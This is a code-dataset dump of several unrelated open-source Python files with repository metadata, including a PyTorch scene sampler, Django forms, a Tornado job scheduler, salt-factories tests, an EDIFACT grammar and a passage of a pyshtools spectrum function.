glycomedb_download_cache = ResourcePath(pjoin(data_directory, "glycome-db-download-cache"))
taxonomylite_store = ResourcePath(pjoin(data_directory, "taxonomylite.db"))
def make_absolute_sqlite_sqlalchemy_uri(path):
return "sqlite:///%s" % path
def configure_color_store():
'''Use a disk-based data-store to persist color assignments
'''
color_map = colors._color_mapper.color_name_map
cmap = sqlitedict.open(display_store, "colors", autocommit=True)
cmap.update(color_map)
colors._color_mapper.color_name_map = cmap
configure_color_store()
unimod.load = partial(unimod.load, make_absolute_sqlite_sqlalchemy_uri(unimod_store))
| [
"mobiusklein@gmail.com"
] | mobiusklein@gmail.com |
911c01224778fd2b7f5f5f645eb0716acbf69539 | c3d0a0b6336a3ff73724fe1615eb1809dbdaaed8 | /Extra Lockdown Tasks/Logical_Operators.py | 6b1193d9bf1da442ed977288478970802a3c804f | [] | no_license | Silentsoul04/FTSP_2020 | db0dae6cd9c371f3daa9219f86520dfa66348236 | 7e603af918da2bcfe4949a4cf5a33107c837894f | refs/heads/master | 2022-12-21T20:44:32.031640 | 2020-09-20T12:29:58 | 2020-09-20T12:29:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # Logical Operators in Python :-
# Identity
# Membership
Truth table
and , or , not
x y o/p
0 0 0
0 1 0
1 0 0
1 1 1
ex:-
x = 100
y = 200
print(x<y and y>x)
print(x<y and y<x)
OR Truth Table
x y o/p
0 0 0
0 1 1
1 0 1
1 1 1
Ex :-
x = 1001
y = 200
print(x<y or x>y)
x = True
print(not(x))
EX :-
x = 100
y = 200
print(x<y)
print(not(x<y))
# Identity Operator :-
is , is not
x = 100
#y = 200
y = 100
print(x is y)
print(x is y)
print(id(x))
print(id(y))
x = 100
y = 200
print(x is not y)
print(id(x))
print(id(y))
# Membership Operators :-
in , not in
l1 = [10,20,30,'Python','Surya']
print('Python' in l1)
print(1001 not in l1)
print('Apple' in l1)
| [
"sharma90126@gmail.com"
] | sharma90126@gmail.com |
1db20ad25163c045f050fd3441c29eb62f9bb3d9 | 2a0055c32cb34b48fd3ef705000ce373376d5439 | /src/lib/training/scene_sampler.py | f4bdc5828e958cecb388cd84228d0eef206f8bdc | [
"MIT"
] | permissive | pfnet-research/kaggle-lyft-motion-prediction-4th-place-solution | dc60818b96eea5181b2c923ea60cdacc02dd7187 | 0bc51075db31a747eeebb7f4775a3cd26ad5f870 | refs/heads/master | 2023-01-29T16:30:38.757836 | 2020-12-09T06:18:46 | 2020-12-09T06:18:46 | 319,860,058 | 48 | 10 | null | null | null | null | UTF-8 | Python | false | false | 3,540 | py | import math
import torch
from torch.utils.data import Sampler
import torch.distributed as dist
import numpy as np
def get_valid_starts_and_ends(get_frame_arguments: np.ndarray, min_state_index: int = 0):
get_frame_arguments = get_frame_arguments[:] # put on the memory if the array is zarr
scene_change_points = np.where(np.diff(get_frame_arguments[:, 1], 1) > 0)[0] + 1
starts = np.r_[0, scene_change_points]
ends = np.r_[scene_change_points, len(get_frame_arguments)]
valid_starts, valid_ends = [], []
while len(starts) > 0:
ok = get_frame_arguments[starts, 2] >= min_state_index
valid_starts.append(starts[ok])
valid_ends.append(ends[ok])
starts, ends = starts[~ok], ends[~ok]
starts += 1
ok = starts < ends
starts, ends = starts[ok], ends[ok]
return np.concatenate(valid_starts), np.concatenate(valid_ends)
class SceneSampler(Sampler):
def __init__(self, get_frame_arguments: np.ndarray, min_state_index: int = 0) -> None:
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
def __len__(self) -> int:
return len(self.starts)
def __iter__(self):
indices = np.random.permutation(len(self.starts))
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
class DistributedSceneSampler(Sampler):
def __init__(
self,
get_frame_arguments: np.ndarray,
min_state_index: int = 0,
num_replicas=None,
rank=None,
shuffle=True,
seed=0
) -> None:
if num_replicas is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
num_replicas = dist.get_world_size()
if rank is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
self.num_replicas = num_replicas
self.rank = rank
self.epoch = 0
self.num_samples = int(math.ceil(len(self.starts) * 1.0 / self.num_replicas))
self.total_size = self.num_samples * self.num_replicas
self.shuffle = shuffle
self.seed = seed
def __iter__(self):
if self.shuffle:
# deterministically shuffle based on epoch and seed
g = torch.Generator()
g.manual_seed(self.seed + self.epoch)
indices = torch.randperm(len(self.starts), generator=g).tolist()
else:
indices = list(range(len(self.starts)))
# add extra samples to make it evenly divisible
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
indices = indices[self.rank:self.total_size:self.num_replicas]
assert len(indices) == self.num_samples
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
r"""
Sets the epoch for this sampler. When :attr:`shuffle=True`, this ensures all replicas
use a different random ordering for each epoch. Otherwise, the next iteration of this
sampler will yield the same ordering.
Arguments:
epoch (int): Epoch number.
"""
self.epoch = epoch
| [
"acc1ssnn9terias@gmail.com"
] | acc1ssnn9terias@gmail.com |
51722ce4582e94fa2bcfb5e42f6fbbe0258d6a0f | da3b9260ee5b352c9438a43d155cebedd46e2fc9 | /emlearn/tools/window_function.py | ef59e239eb95e8de7970a2e6a2d284d740b21f6d | [
"MIT"
] | permissive | profjefer/emlearn | 8eadde4d63f8cb2edd1d33a556039b5b08185bf2 | cc5fd962f5af601c02dfe0ec9203d1b30e6b3aef | refs/heads/master | 2023-07-15T02:36:56.072459 | 2021-08-08T09:52:00 | 2021-08-08T09:52:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,315 | py |
"""eml-window-function: Generating C code for window functions
Part of the emlearn project: https://emlearn.org
Redistributable under the MIT license
"""
import argparse
import textwrap
from .. import cgen
# Supports everything without parameters in scipy.signal.get_window
_known = 'boxcar, triang, blackman, hamming, hann, bartlett, flattop, parzen, bohman, blackmanharris, nuttall, barthann'
known_window_types = tuple(_known.split(', '))
def parse(args=None):
parser = argparse.ArgumentParser(description='Generate lookup table for window functions')
a = parser.add_argument
a('--window', type=str, default='hann',
help='Window function to use. Supported: \n' + '|'.join(known_window_types))
a('--length', type=int, default=1024,
help='Number of coefficients in window')
a('--symmetric', default=False, action='store_true',
help='Whether to use a symmetric window. Defaults to False, normal for FFT')
a('--name', type=str, default='',
help='Name of the generate C array')
a('--out', type=str, default='',
help='Output file. Default: $name.h')
a('--linewrap', type=int, default=70,
help='Maximum width of lines')
parsed = parser.parse_args(args)
return parsed
def window_function(name, window_type, length, fft_mode, linewrap):
import scipy.signal
window = scipy.signal.get_window(window_type, length, fftbins=fft_mode)
gen = cgen.array_declare(name, length, values=window)
w = textwrap.wrap(gen, linewrap)
wrapped = '\n'.join(w)
return wrapped
def main():
args = parse()
window_type = args.window
length = args.length
fft_mode = not args.symmetric
name = args.name
out = args.out
if not name:
name = '_'.join([window_type, str(length), 'lut'])
if not out:
out = name+'.h'
if window_type not in known_window_types:
print('Warning: Unknown window type {}. Known:\n {}'.format(window_type, known_window_types))
preamble = '// This file was generated with emlearn using eml-window-function\n\n'
wrapped = window_function(name, window_type, length, fft_mode, args.linewrap)
wrapped = preamble + wrapped
with open(out, 'w') as f:
f.write(wrapped)
print('Wrote to', out)
if __name__ == '__main__':
main()
| [
"jononor@gmail.com"
] | jononor@gmail.com |
4037b86353a2311197e3c0421e50369f7d041340 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /utils.py | aab51dd8b4c7a0d60394907fa69bc482cd0d2d7e | [] | no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py |
class TreeNode(object):
def __init__(self, x, left=None, right=None):
self.val = x
self.left = left
self.right = right
| [
"songlin.lin@yundata.com"
] | songlin.lin@yundata.com |
7a5a5eb855c8c133eaf70cae42962096075431d4 | 2fab03dd2bc2b214a1f608e3ddb1990b052fcfd0 | /first_forms/apps/forms/forms.py | 07fa07485b8a1ed4396b54d89357f6cc1dbf3671 | [] | no_license | tlee0058/Django_FORMS | 7f7bdbbdc090f59231c8dd1e4624ff16b7a88890 | 2260b86c3d06fd2a10f867481f9e4a068997fd6a | refs/heads/master | 2020-03-09T07:59:31.055697 | 2018-04-08T21:27:35 | 2018-04-08T21:27:35 | 128,678,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from django import forms
from .models import User
class RegistrationForm(forms.Form):
    """Plain (non-model) signup form; both password fields render as password inputs."""
    first_name = forms.CharField(max_length=45)
    last_name = forms.CharField(max_length=45)
    email = forms.EmailField()
    password = forms.CharField(max_length=100, widget=forms.PasswordInput)
    # NOTE(review): no clean() compares password and confirm_password -- confirm
    # whether the match is validated elsewhere (e.g. in the view).
    confirm_password = forms.CharField(max_length=100, widget=forms.PasswordInput)
class RegisterForm(forms.ModelForm):
    """ModelForm exposing every field of the User model."""
    class Meta:
        model = User
        fields = '__all__'
"tlee0058@gmail.com"
] | tlee0058@gmail.com |
7b1f9660c366b7545b5e9bf7fe81748e3e2d5df8 | 4760a482ed52eb7f786e6987e55704fcfb33dd18 | /app.py | 15435449c61f34cd0ec135223aadbf9d16a11212 | [] | no_license | zhidu-qidian/scheduler | 18566993df81fb3b211d783aacef0c5b4268d8d6 | 08be2a10eb769ccb2da6d3de17bd19b4c029cd87 | refs/heads/master | 2021-05-15T18:41:15.254984 | 2017-10-20T08:19:31 | 2017-10-20T08:19:31 | 107,651,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,101 | py | # coding: utf-8
from datetime import datetime
import logging
import sys
from urllib import quote
from apscheduler.schedulers.tornado import TornadoScheduler
from apscheduler.jobstores.base import JobLookupError
from pymongo import MongoClient
from redis import from_url
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.web import RequestHandler
redis_url = "redis://内网地址:6379"
# redis_url = "redis://127.0.0.1:6379"
redis = from_url(redis_url, db=2, max_connections=10)
MONGODB_HOST_PORT = "内网地址:27017"
MONGODB_PASSWORD = ""
COL_RULES = "timerules"
def get_mongodb_database(database, user="third"):
    """Connect to MongoDB and return the named database with a small pooled client."""
    # the password is percent-encoded so special characters survive the URI
    uri = "mongodb://{0}:{1}@{2}/{3}".format(
        user, quote(MONGODB_PASSWORD), MONGODB_HOST_PORT, database)
    return MongoClient(host=uri, maxPoolSize=5, minPoolSize=1).get_default_database()
def task(struct, key, value):
    """Scheduled job body: push `value` into redis under `key` as a set or list member."""
    writers = {"set": redis.sadd, "list": redis.rpush}
    writer = writers.get(struct)
    # unknown structure names are silently ignored, as before
    if writer is not None:
        writer(key, value)
def format_trigger(string):
    """Parse a rule string into an APScheduler (trigger_name, trigger_kwargs) pair.

    Three formats are recognized:
      * interval -- "T<n>D<n>H<n>M<n>S", e.g. "T2H30M" (any subset of units)
      * cron     -- "month;day;hour;minute;second"
      * date     -- "YYYY-mm-dd HH:MM:SS" (one-shot run)
    """
    spec = string.strip()
    if spec[0] == "T":  # interval spec
        unit_names = {"D": "days", "H": "hours", "M": "minutes", "S": "seconds"}
        params = {}
        begin = 1  # skip the leading "T"
        for pos, ch in enumerate(spec):
            if ch in unit_names:
                params[unit_names[ch]] = int(spec[begin:pos])
                begin = pos + 1
        return "interval", params
    if ";" in spec:  # cron spec
        fields = spec.split(";")
        return "cron", {
            "month": fields[0],
            "day": fields[1],
            "hour": fields[2],
            "minute": fields[3],
            "second": fields[4],
        }
    # date spec: a single absolute run time
    return "date", {"run_date": datetime.strptime(spec, "%Y-%m-%d %H:%M:%S")}
class TaskHandler(RequestHandler):
    """REST endpoint (/tasks) managing APScheduler jobs.

    GET lists jobs, POST creates/replaces a job that pushes a value into
    redis, DELETE removes a job and its persisted rule.
    """
    def get(self, *args, **kwargs):
        """List all jobs, or only those named by one or more ?id= parameters."""
        ids = self.get_arguments("id")
        results = {"jobs": list()}
        if ids:
            for _id in ids:
                job = self.application.sdr.get_job(job_id=_id)
                if job:
                    next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
                    results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
        else:
            for job in self.application.sdr.get_jobs():
                next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
                results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
        self.write(results)
    def post(self, *args, **kwargs):
        """Create or replace a scheduled job; persist non-"date" rules to MongoDB."""
        _id = self.get_argument("id")
        rule = self.get_argument("rule")
        key = self.get_argument("key")
        value = self.get_argument("value")
        struct = self.get_argument("struct")
        # NOTE(review): this "or" chain rejects only when *all* params are
        # empty; presumably "and" (any missing) was intended -- confirm.
        if not (_id or rule or key or value or struct):
            self.write({"code": 400, "message": "invalid params"})
        else:
            trigger, params = format_trigger(rule)
            self.application.sdr.add_job(
                task,
                trigger=trigger,
                args=[struct, key, value],
                id=_id,
                replace_existing=True,
                **params
            )
            data = {"_id": _id, "rule": rule, "key": key, "value": value,
                    "struct": struct}
            # one-shot "date" jobs are not persisted: they must not be
            # re-registered on restart
            if trigger != "date":
                self.store(data)
            self.write({"code": 200, "message": "add job %s success" % _id})
    def delete(self, *args, **kwargs):
        """Remove the job named by ?id= from the scheduler and from MongoDB."""
        _id = self.get_argument("id")
        try:
            self.application.sdr.remove_job(job_id=_id)
            self.remove(_id)
            self.write({"code": 200, "message": "remove job %s success" % _id})
        except JobLookupError:
            self.write({"code": 404, "message": "no such job:%s" % _id})
    def store(self, data):
        """Upsert a rule document (delete-then-insert) with a creation timestamp."""
        col = self.application.db[COL_RULES]
        query = {"_id": data["_id"]}
        if col.count(query):
            col.delete_one(query)
        data["time"] = datetime.now()
        col.insert_one(data)
    def remove(self, _id):
        """Delete the persisted rule document for the given job id."""
        col = self.application.db[COL_RULES]
        query = {"_id": _id}
        col.delete_one(query)
class Application(web.Application):
    """Tornado application wiring /tasks to a shared TornadoScheduler."""
    def __init__(self):
        handlers = [
            ("/tasks", TaskHandler),
        ]
        # scheduler-wide job defaults: merge missed runs (coalesce), allow a
        # 120s misfire grace window, cap concurrent instances per job at 5
        defaults = {
            "coalesce": True,
            "max_instances": 5,
            "misfire_grace_time": 120,
            "replace_existing": True
        }
        scheduler = TornadoScheduler(job_defaults=defaults)
        scheduler.start()
        self.sdr = scheduler
        self.db = get_mongodb_database("thirdparty", "third")
        # re-register rules persisted in MongoDB on startup
        init_schedule_task(scheduler, self.db)
        web.Application.__init__(self, handlers=handlers)
def init_schedule_task(scheduler, db):
    """Re-register every persisted time rule from MongoDB with the scheduler."""
    for doc in db[COL_RULES].find({}):
        trigger_name, trigger_kwargs = format_trigger(doc["rule"])
        scheduler.add_job(
            task,
            trigger=trigger_name,
            args=[doc["struct"], doc["key"], doc["value"]],
            id=doc["_id"],
            replace_existing=True,
            **trigger_kwargs)
        logging.info("add %s job rule %s" % (doc["_id"], doc["rule"]))
def main():
    """Start the HTTP server on the host:port given as argv[1] and block forever."""
    http_server = httpserver.HTTPServer(Application())
    address = sys.argv[1]  # expected form "host:port"
    address = address.split(":")
    host = address[0]
    port = address[1]
    http_server.listen(port=port, address=host)
    ioloop.IOLoop.instance().start()
if __name__ == "__main__":
    # append INFO-and-above messages to a local log file
    logging.basicConfig(level=logging.INFO,
                        format="%(asctime)s %(levelname)s %(message)s",
                        datefmt="%Y-%m-%d %H:%M:%S",
                        filename="log-app.log",
                        filemode="a+")
    main()
| [
"xinyong.wang@qq.com"
] | xinyong.wang@qq.com |
ff315fba136d0af80f9ab92d97c8f7dcd05df541 | 35d16f57feae5fbb29237992590981b324bfe10b | /tests/functional/factories/daemons/test_master_factory.py | c3d1ab277613668aad13b73a7dbf685f1ef2f4b9 | [
"Apache-2.0"
] | permissive | modamod/pytest-salt-factories | 592c477564534c196744f8445c5b62d97190af8e | 4bc885d60ec3f58d0c84283276ba1c99e6c30ba1 | refs/heads/master | 2023-02-13T15:32:34.123167 | 2021-01-19T06:15:33 | 2021-01-19T06:15:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,060 | py | import pytest
from saltfactories.utils import random_string
from saltfactories.utils import running_username
def test_keyword_basic_config_defaults(salt_factories):
    """Entries passed via config_defaults must end up in the generated config."""
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"), config_defaults={"zzzz": True}
    ).config
    assert "zzzz" in master_config
def test_interface_config_defaults(salt_factories):
    """A defaulted 'interface' is replaced by the factory's loopback address."""
    interface = "172.17.0.1"
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"), config_defaults={"interface": interface}
    ).config
    assert master_config["interface"] != interface
    assert master_config["interface"] == "127.0.0.1"
def test_keyword_basic_config_overrides(salt_factories):
    """Entries passed via config_overrides must end up in the generated config."""
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"), config_overrides={"zzzz": True}
    ).config
    assert "zzzz" in master_config
def test_interface_config_overrides(salt_factories):
    """'interface' passed via config_overrides must win over the factory default."""
    interface = "172.17.0.1"
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"), config_overrides={"interface": interface}
    ).config
    assert master_config["interface"] != "127.0.0.1"
    assert master_config["interface"] == interface
def test_keyword_simple_overrides_override_defaults(salt_factories):
    """A key present in both dicts takes its value from config_overrides."""
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"), config_defaults={"zzzz": False}, config_overrides={"zzzz": True}
    ).config
    assert "zzzz" in master_config
    assert master_config["zzzz"] is True
def test_keyword_nested_overrides_override_defaults(salt_factories):
    """Nested override dicts are merged into (not replacing) the defaults."""
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"),
        config_defaults={
            "zzzz": False,
            "user": "foobar",
            "colors": {"black": True, "white": False},
        },
        config_overrides={"colors": {"white": True, "grey": False}},
    ).config
    assert "zzzz" in master_config
    assert master_config["zzzz"] is False
    # "black" survives from defaults; "white" is overridden; "grey" is added
    assert master_config["colors"] == {"black": True, "white": True, "grey": False}
def test_provide_root_dir(testdir, salt_factories):
    """An explicit root_dir in config_defaults must be preserved verbatim."""
    root_dir = testdir.mkdir("custom-root")
    config_defaults = {"root_dir": root_dir}
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"), config_defaults=config_defaults
    ).config
    assert master_config["root_dir"] == root_dir
def configure_kwargs_ids(value):
    """Build a readable pytest parametrize id from a configure-kwargs dict."""
    return "configure_kwargs=" + repr(value)
@pytest.mark.parametrize(
    "configure_kwargs",
    [{"config_defaults": {"user": "blah"}}, {"config_overrides": {"user": "blah"}}, {}],
    ids=configure_kwargs_ids,
)
def test_provide_user(salt_factories, configure_kwargs):
    """An explicit 'user' is honored; otherwise the running user is injected."""
    master_config = salt_factories.get_salt_master_daemon(
        random_string("master-"), **configure_kwargs
    ).config
    if not configure_kwargs:
        # salt-factories injects the current username
        assert master_config["user"] is not None
        assert master_config["user"] == running_username()
    else:
        # salt-factories does not override the passed user value
        assert master_config["user"] != running_username()
        assert master_config["user"] == "blah"
@pytest.mark.parametrize(
    "configure_kwargs",
    [
        {"config_defaults": None},
        {"config_overrides": None},
        {},
        {"config_defaults": None, "config_overrides": {"user": "blah"}},
        {"config_defaults": {"user": "blah"}, "config_overrides": None},
        {"config_defaults": {"user": "blah"}, "config_overrides": {"user": "blah"}},
    ],
    ids=configure_kwargs_ids,
)
def test_pytest_config(salt_factories, configure_kwargs):
    """The factory always injects a 'pytest-master' section with log settings."""
    master_id = random_string("master-")
    config = salt_factories.get_salt_master_daemon(master_id, **configure_kwargs).config
    config_key = "pytest-master"
    assert config_key in config
    assert "log" in config[config_key]
    for key in ("host", "level", "port", "prefix"):
        assert key in config[config_key]["log"]
"pedro@algarvio.me"
] | pedro@algarvio.me |
0dbd426f8b5f12dbc8f3d582a2e24f5700f8f1b1 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005965.py | 190e8d7a975427451853e01e989a121bf4b152c5 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher141996(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.3.3.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.3.3.1.0_1', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher141996._instance is None:
CommutativeMatcher141996._instance = CommutativeMatcher141996()
return CommutativeMatcher141996._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 141995
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
f05aad2d52815971fbc0b159d3996d831cefae17 | 2e3fd7f4d78847fbd713f521587fe39116fa34a0 | /glue/managers/simple.py | b7bf5644c754f60f1c85d25068b9074bab0f536c | [
"BSD-2-Clause"
] | permissive | jkenlooper/glue | 24e3da4a94ec34632391f8ce93826cce3c347a57 | 8d2788fce4e23c314b2428831d34f89cdbeb2a9c | refs/heads/master | 2021-09-09T10:52:56.701113 | 2021-04-10T12:37:53 | 2021-04-10T12:37:53 | 181,468,692 | 0 | 0 | NOASSERTION | 2019-04-15T10:58:51 | 2019-04-15T10:58:51 | null | UTF-8 | Python | false | false | 330 | py | from .base import BaseManager
class SimpleManager(BaseManager):
"""Process a single folder and create one sprite. It works the
same way as :class:`~ProjectSpriteManager`, but only for one folder.
This is the default manager.
"""
def find_sprites(self):
self.add_sprite(path=self.config['source'])
| [
"me@jorgebastida.com"
] | me@jorgebastida.com |
c976055f913211d6c572da188dd343620dd1777c | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D11A/COLREQD11AUN.py | 43c7ae15b28a1c63211d543e79f5399cf0ce7c28 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,421 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD11AUN import recorddefs
# COLREQ (D.11A) message structure: nested segment groups, each entry giving
# the segment ID and its min/max repetition counts. Generated from the
# UN-docs by the bots translator -- do not edit by hand.
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
    {ID: 'BGM', MIN: 1, MAX: 1},
    {ID: 'DTM', MIN: 0, MAX: 1},
    {ID: 'FCA', MIN: 1, MAX: 1},
    {ID: 'DOC', MIN: 1, MAX: 40},
    {ID: 'INP', MIN: 0, MAX: 20},
    {ID: 'FTX', MIN: 0, MAX: 15},
    {ID: 'FII', MIN: 1, MAX: 7, LEVEL: [
        {ID: 'RFF', MIN: 0, MAX: 1},
        {ID: 'CTA', MIN: 0, MAX: 1},
        {ID: 'COM', MIN: 0, MAX: 5},
    ]},
    {ID: 'NAD', MIN: 1, MAX: 9, LEVEL: [
        {ID: 'RFF', MIN: 0, MAX: 3},
        {ID: 'CTA', MIN: 0, MAX: 1},
        {ID: 'COM', MIN: 0, MAX: 5},
    ]},
    {ID: 'PYT', MIN: 1, MAX: 1, LEVEL: [
        {ID: 'DTM', MIN: 0, MAX: 1},
        {ID: 'FTX', MIN: 0, MAX: 1},
    ]},
    {ID: 'MOA', MIN: 1, MAX: 5, LEVEL: [
        {ID: 'FTX', MIN: 0, MAX: 1},
    ]},
    {ID: 'TDT', MIN: 0, MAX: 1, LEVEL: [
        {ID: 'DTM', MIN: 0, MAX: 1},
        {ID: 'LOC', MIN: 0, MAX: 3},
    ]},
    {ID: 'GEI', MIN: 0, MAX: 10, LEVEL: [
        {ID: 'MOA', MIN: 0, MAX: 1},
        {ID: 'LOC', MIN: 0, MAX: 2},
        {ID: 'NAD', MIN: 0, MAX: 1},
        {ID: 'RCS', MIN: 0, MAX: 1},
        {ID: 'FTX', MIN: 0, MAX: 10},
    ]},
    {ID: 'AUT', MIN: 0, MAX: 1, LEVEL: [
        {ID: 'DTM', MIN: 0, MAX: 1},
    ]},
    {ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
732aa5dde56b43bc0f071270e29ec985954b334e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03346/s258893438.py | 945e31f4eeb13ab37b2dc35c29cda1e50389a8ca | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import sys
input = sys.stdin.readline
import heapq
def read():
    """Read N, then N permutation values (one per line), from stdin."""
    N = int(input().strip())
    P = [int(input().strip()) for _ in range(N)]
    return N, P
def solve(N, P):
Q = [0 for i in range(N)]
for i in range(N):
Q[P[i]-1] = i
max_count = 0
count = 0
prev = -1
for i in range(N):
q = Q[i]
if prev < q:
count += 1
prev = q
else:
max_count = max(max_count, count)
count = 1
prev = q
max_count = max(max_count, count)
return N - max_count
# Script entry point: read the input, solve, print the answer.
if __name__ == '__main__':
    inputs = read()
    print("%s" % solve(*inputs))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
18f082ffc446b47fa664e4b53b891ae87ac64a7e | b0b87924d07101e25fa56754ceaa2f22edc10208 | /workspace/DL/DL3-2.py | ae888fd2295b854fffc3b000ca76341442b1ef96 | [] | no_license | SoheeKwak/Python | 2295dd03e5f235315d07355cbe72998f8b86c147 | e1a5f0ecf31e926f2320c5df0e3416306b8ce316 | refs/heads/master | 2020-04-02T13:49:58.367361 | 2018-11-23T09:33:23 | 2018-11-23T09:33:23 | 154,499,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | import tensorflow as tf
# Linear regression with TF1 graph mode: model y = w*x + b, starting from
# initial guesses for w and b.
w=tf.Variable([.3], tf.float32)
b=tf.Variable([-.3], tf.float32)
x=tf.placeholder(tf.float32)
y=tf.placeholder(tf.float32)
lm=x*w+b  # linear model prediction
loss=tf.reduce_sum(tf.square(lm-y))  # sum of squared errors
train=tf.train.GradientDescentOptimizer(0.01).minimize(loss)
x_train=[1,2,3,4]
y_train=[0,-1,-2,-3]
# Train for 1000 steps to fit the model, then print the resulting
# w, b and loss. (The print labels are Korean: "w value / b value / loss value".)
sess=tf.Session()
sess.run(tf.global_variables_initializer())
for i in range(1000):
    sess.run(train,feed_dict={x:x_train,y:y_train})
wv, bv, lossv = sess.run([w,b,loss],feed_dict={x:x_train, y:y_train})
print("w값:%s b값:%s loss값:%s" % (wv, bv, lossv))
| [
"soheekwak728@gmail.com"
] | soheekwak728@gmail.com |
4a9a89a9bd4fe83f91578a20cf8ba51411b5e658 | b9b7bf5d82ffc7c972dda803241c3e6247a92002 | /pyshtools/spectralanalysis/spectrum.py | 048b9436736827a5214869cb2a7209fb92ee713e | [
"BSD-3-Clause"
] | permissive | MMesch/SHTOOLS | 9aff298b8075f7d9fad9690ab2053e934197403d | 72bf04fb9b83f17c2dac2a8f252a8634d6f7588a | refs/heads/master | 2021-01-24T20:02:42.911226 | 2017-12-25T22:35:00 | 2017-12-25T22:35:00 | 26,169,620 | 1 | 0 | null | 2016-08-29T11:57:46 | 2014-11-04T13:22:14 | null | UTF-8 | Python | false | false | 4,810 | py | import numpy as _np
def spectrum(clm, normalization='4pi', degrees=None, lmax=None,
             convention='power', unit='per_l', base=10.):
    """
    Return the spectrum of spherical harmonic coefficients as a function of
    spherical harmonic degree.

    Usage
    -----
    array = spectrum(clm, [normalization, degrees, lmax, convention,
                           unit, base])

    Returns
    -------
    array : ndarray, shape (len(degrees))
        1-D ndarray of the spectrum.

    Parameters
    ----------
    clm : ndarray, shape (2, lmax + 1, lmax + 1)
        Spherical harmonic coefficients; clm[0] holds the cosine (positive
        order) terms and clm[1] the sine (negative order) terms.
    normalization : str, optional, default = '4pi'
        '4pi', 'ortho' or 'schmidt' for geodesy 4pi normalized,
        orthonormalized, or Schmidt semi-normalized coefficients.
    lmax : int, optional, default = len(clm[0,:,0]) - 1
        Maximum degree used when building the default degree range.
    degrees : ndarray, optional, default = numpy.arange(lmax+1)
        Degrees at which the spectrum is evaluated.
    convention : str, optional, default = 'power'
        'power', 'energy' or 'l2norm'. Total power is the integral of the
        squared function divided by the area it spans; total energy is 4pi
        times the power; the l2-norm is the plain sum of the squared
